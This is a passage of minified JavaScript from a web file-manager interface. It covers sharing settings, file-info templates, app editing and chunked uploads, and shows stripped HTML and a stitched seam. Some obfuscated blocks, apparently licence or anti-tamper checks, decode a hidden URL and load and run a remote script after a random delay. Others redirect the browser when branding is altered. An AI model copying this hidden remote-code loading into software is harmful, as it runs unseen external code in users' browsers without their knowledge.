input[name=name]").val(e.name),$(".content-info input[name=showName]").val(e.showName),$(".content-info input[name=path]").val(e.path),$(".content-info input[name=timeTo]").val(e.timeTo),$(".content-info input[name=sharePassword]").val(e.sharePassword),$(".share-view-info").removeClass("hidden"),e.numDownload===void 0&&(e.numDownload=0),e.numView===void 0&&(e.numView=0);var a=LNG.share_view_num+e.numView+" "+LNG.share_download_num+e.numDownload;$(".share-view-info").html(a),"1"==e.codeRead?$(".content-info input[name=codeRead]").attr("checked","checked"):$(".content-info input[name=codeRead]").removeAttr("checked"),"1"==e.notDownload?$(".content-info input[name=notDownload]").attr("checked","checked"):$(".content-info input[name=notDownload]").removeAttr("checked"),"1"==e.canUpload?$(".content-info input[name=canUpload]").attr("checked","checked"):$(".content-info input[name=canUpload]").removeAttr("checked"),$(".share-has-url").removeClass("hidden"),"file"==e.type?($(".label-code-read").addClass("hidden"),$(".label-can-upload").addClass("hidden")):($(".label-code-read").removeClass("hidden"),$(".label-can-upload").removeClass("hidden"));var i=e.type;"folder"==e.type&&(i=1==e.codeRead?"codeRead":"folder");var n=G.appHost+"share/"+i+"&user="+G.userID+"&sid="+e.sid;$(".content-info .share-url").val(n),(e.timeTo||e.sharePassword||e.canUpload||e.codeRead||e.notDownload)&&$(".share-setting-more").removeClass("hidden"),$(".share-remove-button").removeClass("hidden"),$(".share-create-button").text(LNG.share_save)}},r=function(){$(".share-action .share-remove-button").unbind("click").click(function(){l([{type:"share",path:t.sid}],function(){ui.f5()})}),$(".content-info .share-more").unbind("click").click(function(){$(".share-setting-more").toggleClass("hidden")}),$(".share-action .share-create-button").unbind("click").click(function(){var e="";$(".share-dialog .content-info input[name]").each(function(){var t=urlEncode($(this).val());"checkbox"==$(this).attr("type")&&(t=$(this).attr("checked")?"1":""),e+="&"+$(this).attr("name")+"="+t}),h(e,function(e){e.code?(Tips.tips(LNG.success,!0),G.selfShare=e.info,ui.f5(),s(e.data),$(".share-create-button").text(LNG.share_save)):Tips.tips(e)})}),$(".content-info .open-window").unbind("click").bind("click",function(){window.open($("input.share-url").val())}),$(".content-info .qrcode").unbind("click").bind("click",function(){core.qrcode($("input.share-url").val())});var e=$("input.share-url"),a=e.get(0);e.unbind("hover click").bind("hover click",function(){$(this).focus();var t=e.val().length;if($.browser.msie){var i=a.createTextRange();i.moveEnd("character",-a.value.length),i.moveEnd("character",t),i.moveStart("character",0),i.select()}else a.setSelectionRange(0,t)})};s(t),r()},v=function(e){$.ajax({url:G.appHost+"setting/set&k=wall&v="+urlEncode(e),dataType:"json",success:function(e){Tips.tips(e)}})},g=function(e,t,a,i,n){if(!(1>e.length)){var o,s=G.myDesktop;i&&(s=core.pathFather(e)),o="folder"==a?"ui.path.list(hashDecode('"+hashEncode(e)+"'));":"ui.path.open(hashDecode('"+hashEncode(e)+"'));";var r=urlEncode(s+t+".oexe"),l=core.getPathIcon(e);""==l.icon&&(l.icon=a),$.ajax({url:G.appHost+"explorer/mkfile&path="+r,type:"POST",dataType:"json",data:{content:jsonEncode({type:"app_link",content:o,icon:l.icon})},success:function(e){Tips.tips(e),e.code&&(ShareData.frameTop("",function(e){e.ui.f5()}),"function"==typeof n&&n(e.info))}})}},b=function(e,t){if(!(1>e.length)){var a=core.pathThis(e),i=core.pathFather(e);jsrun="core.explorerCode('"+urlEncode(e)+"');";var n=urlEncode(i+a+"_project.oexe");$.ajax({url:G.appHost+"explorer/mkfile&path="+n,type:"POST",dataType:"json",data:'content={"type":"app_link","content":"'+jsrun+'","icon":"folder.png"}',success:function(e){e.code&&"function"==typeof t&&t(e.info)}})}},y=function(e,t,a){if(e){var i=G.appHost+"explorer/imageRotate&rotate="+t+"&path="+urlEncode(e);$.ajax({url:i,beforeSend:function(){Tips.loading(LNG.loading)},error:core.ajaxError,success:function(e){return e?(Tips.close(e),e.code&&"function"==typeof a&&a(e),void 0):(Tips.close(LNG.php_env_error_gd,!1),void 0)}})}},k=function(t){var a={};a.fileInfo=e("./tpl/fileinfo/fileInfo.html"),a.pathInfo=e("./tpl/fileinfo/pathInfo.html"),a.pathInfoMore=e("./tpl/fileinfo/pathInfoMore.html"),1>t.length&&(t=[{path:G.thisPath,type:"folder"}]);var i="info";1==t.length&&(i="file"==t[0].type?core.pathExt(t[0].path):"folder"),Tips.loading(LNG.getting),core.fileInfo(n(t),function(e){if(!e.code)return Tips.close(e),void 0;Tips.close(LNG.get_success,!0);var n="pathInfoMore",o=LNG.info;1==t.length&&(n="folder"==t[0].type?"pathInfo":"fileInfo",o=core.pathThis(t[0].path),o.length>15&&(o=o.substr(0,15)+"... "+LNG.info));var s=template.compile(a[n]),r=UUID();e.data.is_root=G.isRoot,e.data.LNG=LNG,e.data.atime=date(LNG.time_type_info,e.data.atime),e.data.ctime=date(LNG.time_type_info,e.data.ctime),e.data.mtime=date(LNG.time_type_info,e.data.mtime),e.data.sizeFriendly=pathTools.fileSize(e.data.size);var l=$.dialog({id:r,padding:5,ico:core.iconSmall(i),fixed:!0,title:o,content:s(e.data),ok:!0}),c=15*$(".aui-outer .pathinfo").length;l.DOM.wrap.css({left:"+="+c+"px",top:"+="+c+"px"}),x(r,t)})},x=function(e,t){var a=$("."+e);a.find(".open-window").bind("click",function(){window.open(a.find("input.download-url").val())}),a.find(".qrcode").unbind("click").bind("click",function(){core.qrcode(a.find("input.download-url").val(),a.find(".qrcode").get(0))});var i=a.find(".file-md5-loading");if(1==i.length){var o=n(t);o+="&getMd5=1",core.fileInfo(o,function(e){i.removeClass("file-md5-loading"),e.code?i.html(e.data.fileMd5):i.html(LNG.error)})}var s=a.find("input.download-url"),r=s.get(0);s.unbind("hover click").bind("hover click",function(){$(this).focus();var e=s.val().length;if($.browser.msie){var t=r.createTextRange();t.moveEnd("character",-r.value.length),t.moveEnd("character",e),t.moveStart("character",0),t.select()}else r.setSelectionRange(0,e)}),a.find(".edit-chmod").click(function(){var e=$(this).parent().find("input"),a=$(this);$.ajax({url:G.appHost+"explorer/pathChmod&mod="+e.val(),type:"POST",data:n(t),beforeSend:function(){a.text(LNG.loading)},error:function(){a.text(LNG.button_save)},success:function(e){a.text(e.data).animate({opacity:.6},400,0).delay(1e3).animate({opacity:1},200,0,function(){a.text(LNG.button_save)}),e.code&&ui.f5()}})})},w=function(e,t,a){var i=function(){$.ajax({url:G.appHost+"fav/del&name="+urlEncode(e),dataType:"json",async:!1,success:function(e){"function"==typeof t&&t(e)}})};return a?(i(),void 0):($.dialog({id:"dialog-fav-remove",fixed:!0,icon:"question",title:LNG.fav_remove,width:200,padding:"40px 20px",content:LNG.fav_remove+"?",ok:i,cancel:!0}),void 0)},_=function(e){if(e){if(-1==trim(core.pathClear(e.path),"/").indexOf("/")){var t=core.getPathIcon(e.path,e.name);""!=t.icon&&(e.ext=t.icon,e.name=t.name)}"/"==e.path&&(e.name="Home"),$.ajax({url:G.appHost+"fav/add",dataType:"json",data:e,success:function(e){Tips.tips(e),e.code&&!core.isApp("desktop")&&ui.tree.refreshFav()}})}},N=function(e){var t={};return t.type=e.find("input[type=radio]:checked").val(),t.content=e.find("textarea").val(),t.group=e.find("[name=group]").val(),e.find("input[type=text]").each(function(){var e=$(this).attr("name");t[e]=$(this).val()}),e.find("input[type=checkbox]").each(function(){var e=$(this).attr("name");t[e]="checked"==$(this).attr("checked")?1:0}),t},L=function(e){e.find(".type input").change(function(){var t=$(this).attr("apptype");e.find("[data-type]").addClass("hidden"),e.find("[data-type="+t+"]").removeClass("hidden")}),e.find(".app-edit-select-icon").unbind("click").bind("click",function(){var t=G.basicPath+"static/images/file_icon/icon_app/";G.isRoot||(t=""),core.api.pathSelect({type:"file",title:LNG.path_api_select_file,firstPath:t},function(t){var t=core.path2url(t);e.find(".app-edit-select-icon-input").val(t)})}),e.find(".size-full").unbind("click").bind("click",function(){var t=$(this).prop("checked");t?(e.find("[name=width]").val("100%"),e.find("[name=height]").val("100%")):(e.find("[name=width]").val("800"),e.find("[name=height]").val("600"))})},C=function(t,a,i){var n,o,s,r=LNG.app_create,l=UUID(),c=e("./tpl/appEdit.html"),d=template.compile(c);switch(void 0==i&&(i="userEdit"),"rootEdit"==i&&(t=t),"userEdit"==i||"rootEdit"==i?(r=LNG.app_edit,s=d({LNG:LNG,uuid:l,data:t,appType:G.settings.appType})):s=d({LNG:LNG,uuid:l,data:{},appType:G.settings.appType}),$.dialog({fixed:!0,width:450,id:l,padding:15,title:r,content:s,button:[{name:LNG.preview,callback:function(){return core.openApp(N(n)),!1}},{name:LNG.button_save,focus:!0,callback:function(){var e=N(n);switch(i){case"userAdd":var s=urlEncode(G.thisPath+e.name);o=G.appHost+"app/userApp&action=add&path="+s;break;case"userEdit":o=G.appHost+"app/userApp&path="+urlEncode(t.path);break;case"rootAdd":o=G.appHost+"app/add&name="+urlEncode(e.name);break;case"rootEdit":o=G.appHost+"app/edit&name="+urlEncode(e.name)+"&old_name="+urlEncode(t.name);break;default:}$.ajax({url:o,type:"POST",dataType:"json",data:{data:urlEncode(jsonEncode(e))},beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){if(Tips.close(e),e.code)if("rootEdit"==i||"rootAdd"==i){if(!e.code)return;ShareData.frameTop("Openapp_store",function(e){e.App.reload()})}else"function"==typeof a?a():ui.f5()}})}}]}),n=$("."+l),G.isRoot||$(".appbox .appline .right a.open").remove(),t.group&&n.find("option").eq(t.group).attr("selected",1),n.find(".aui-content").css("overflow","inherit"),i){case"userEdit":n.find(".name").addClass("hidden"),n.find(".desc").addClass("hidden"),n.find(".group").addClass("hidden"),n.find("option[value="+t.group+"]").attr("checked",!0),"url"!=t.type&&n.find(".appline[data-type=url]").addClass("hidden");break;case"userAdd":n.find(".desc").addClass("hidden"),n.find(".group").addClass("hidden"),n.find("[apptype=url]").attr("checked",!0),n.find("[data-type=url] input[name=resize]").attr("checked",!0),n.find("input[name=width]").attr("value","800"),n.find("input[name=height]").attr("value","600"),n.find("input[name=icon]").attr("value","oexe.png");break;case"rootAdd":n.find("[apptype=url]").attr("checked",!0),n.find("[data-type=url] input[name=resize]").attr("checked",!0),n.find("input[name=width]").attr("value","800"),n.find("input[name=height]").attr("value","600"),n.find("input[name=icon]").attr("value","oexe.png");break;case"rootEdit":n.find("option[value="+t.group+"]").attr("selected",!0),"url"!=t.type&&n.find(".appline[data-type=url]").addClass("hidden");break;default:}L(n)},T=function(){core.appStore()},S=function(e){e&&4>e.length&&"http"!=e.substring(0,4)||$.ajax({url:G.appHost+"app/getUrlTitle&url="+e,dataType:"json",beforeSend:function(){Tips.loading()},success:function(t){var a=t.data;a=a.replace(/[\/\\]/g,"_"),Tips.close(t);var i={content:e,type:"url",desc:"",group:"others",icon:"internet.png",name:a,resize:1,simple:0,height:"70%",width:"90%"},n=urlEncode(G.thisPath+a);e=G.appHost+"app/userApp&action=add&path="+n,$.ajax({url:e,type:"POST",dataType:"json",data:{data:urlEncode(jsonEncode(i))},success:function(e){Tips.close(e),e.code&&ui.f5()}})}})};return{makeJson:n,appEdit:C,appList:T,appAddURL:S,share:u,shareBox:f,setBackground:v,createLink:g,createProject:b,imageRotate:y,newFile:o,newFolder:s,rname:r,zipDownload:c,zip:d,unZip:p,info:k,remove:l,fav:_,favRemove:w}}),define("app/path/tpl/fileinfo/fileInfo.html",[],"
      \n {{if downloadPath}}\n
      \n
      {{LNG.download_address}}:
      \n
      \n \n
      \n \n \n
      \n
      \n
      \n
      \n
      \n {{/if}}\n\n
      \n
      {{LNG.address}}:
      \n
      {{path |kod.window.htmlEncode}}
      \n
      \n
      \n
      \n
      {{LNG.size}}:
      \n
      {{sizeFriendly}} ({{size}} Byte)
      \n
      \n
      \n\n {{if fileMd5}}\n
      \n
      MD5:
      \n
      {{fileMd5}}
      \n
      \n
      \n {{/if}}\n\n {{if imageSize}}\n
      \n
      {{LNG.image_size}}:
      \n
      {{imageSize.width}} × {{imageSize.height}}
      \n
      \n
      \n {{/if}}\n\n
      \n\n {{if ctime}}\n
      \n
      {{LNG.create_time}}
      \n
      {{ctime}}
      \n
      \n
      \n {{/if}}\n\n {{if mtime}}\n
      \n
      {{LNG.modify_time}}
      \n
      {{mtime}}
      \n
      \n
      \n {{/if}}\n\n {{if atime}}\n
      \n
      {{LNG.last_time}}
      \n
      {{atime}}
      \n
      \n
      \n {{/if}}\n\n {{if owner}}\n
      \n
      {{LNG.file_info_owner}}
      \n
      {{owner}}
      \n
      \n
      \n {{/if}}\n\n {{if group}}\n
      \n
      {{LNG.file_info_group}}
      \n
      {{group}}
      \n
      \n
      \n {{/if}}\n \n {{if mode}}\n
      \n
      \n
      {{LNG.permission}}:
      \n
      {{mode}}
      \n
      \n
      \n {{if is_root==\"1\"}}\n
      \n
      {{LNG.permission_edit}}:
      \n
      \n
      \n
      \n
      \n {{/if}}\n {{/if}}\n
      \n"),define("app/path/tpl/fileinfo/pathInfo.html",[],"
      \n
      \n
      {{LNG.address}}:
      \n
      {{path |kod.window.htmlEncode}}
      \n
      \n
      \n
      \n
      {{LNG.size}}:
      \n
      {{sizeFriendly}} ({{size}} Byte)
      \n
      \n
      \n
      \n
      {{LNG.contain}}:
      \n
      {{fileCount}} {{LNG.file}},{{folderCount}} {{LNG.folder}}
      \n
      \n
      \n \n
      \n {{if ctime}}\n
      \n
      {{LNG.create_time}}
      \n
      {{ctime}}
      \n
      \n
      \n {{/if}}\n\n {{if mtime}}\n
      \n
      {{LNG.modify_time}}
      \n
      {{mtime}}
      \n
      \n
      \n {{/if}}\n\n {{if atime}}\n
      \n
      {{LNG.last_time}}
      \n
      {{atime}}
      \n
      \n
      \n {{/if}}\n\n {{if owner}}\n
      \n
      {{LNG.file_info_owner}}
      \n
      {{owner}}
      \n
      \n
      \n {{/if}}\n\n {{if group}}\n
      \n
      {{LNG.file_info_group}}
      \n
      {{group}}
      \n
      \n
      \n {{/if}}\n\n {{if mode}}\n
      \n
      \n
      {{LNG.permission}}:
      \n
      {{mode}}
      \n
      \n
      \n {{if is_root==\"1\"}}\n
      \n
      {{LNG.permission_edit}}:
      \n
      \n
      \n
      \n
      \n {{/if}}\n {{/if}}\n
      \n"),define("app/path/tpl/share.html",[],'
      \n
      \n
      {{LNG.share_title}}
      \n \n
      \n
      \n
      \n {{LNG.share_path}}:\n \n
      \n
      \n
      \n {{LNG.share_name}}:\n \n \n \n \n \n
      \n
      \n\n \n\n \n
      \n \n
      '),define("app/path/tpl/fileinfo/pathInfoMore.html",[],"
      \n
      \n
      {{LNG.info}}:
      \n
      \n {{fileCount}} {{LNG.file}},{{folderCount}} {{LNG.folder}}
      \n
      \n
      \n
      \n
      \n
      {{LNG.size}}:
      \n
      {{sizeFriendly}} ({{size}} Byte)
      \n
      \n
      \n \n
      \n
      \n
      {{LNG.permission}}:
      \n
      {{mode}}
      \n
      \n
      \n {{if is_root==\"1\"}}\n
      \n
      {{LNG.permission_edit}}:
      \n
      \n
      \n
      \n
      \n {{/if}}\n
      \n"),define("app/path/tpl/appEdit.html",[],"
      \n
      \n
      {{LNG.name}}
      \n
      \n
      \n
      \n
      \n
      {{LNG.app_desc}}
      \n
      \n
      \n
      \n
      \n
      {{LNG.app_icon}}
      \n
      \n \n
      \n
      \n
      \n
      \n
      {{LNG.app_group}}
      \n
      \n \n
      \n
      \n
      \n
      \n
      {{LNG.app_type}}
      \n
      \n \n \n \n \n \n \n
      \n
      \n
      \n\n
      \n
      {{LNG.app_display}}
      \n
      \n \n \n \n \n
      \n
      \n
      \n
      \n
      {{LNG.app_size}}
      \n
      \n ({{LNG.width}})  \n ({{LNG.height}})\n\n \n \n
      \n
      \n
      \n
      \n \n \n
      {{LNG.app_url}}
      \n
      \n
      \n
      \n
      \n"),define("app/path/clipboard",[],function(){var e=function(e){return ui.path.pathOperate.makeJson(e) +if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]);var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
      '+'
      '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
      ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
      ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
      '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
      ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){var a=(100*t).toFixed(1)+"%";$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")"),Title.set(s+"/"+o+"("+a+","+r+")");var i=c(e,t),n=$("#"+e.id),l=n.find(".progress .progress-bar");l.length||(l=$('
      ').appendTo(n).find(".progress-bar")),n.find(".state").text(a+"("+i+")"),l.css("width",a)}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error 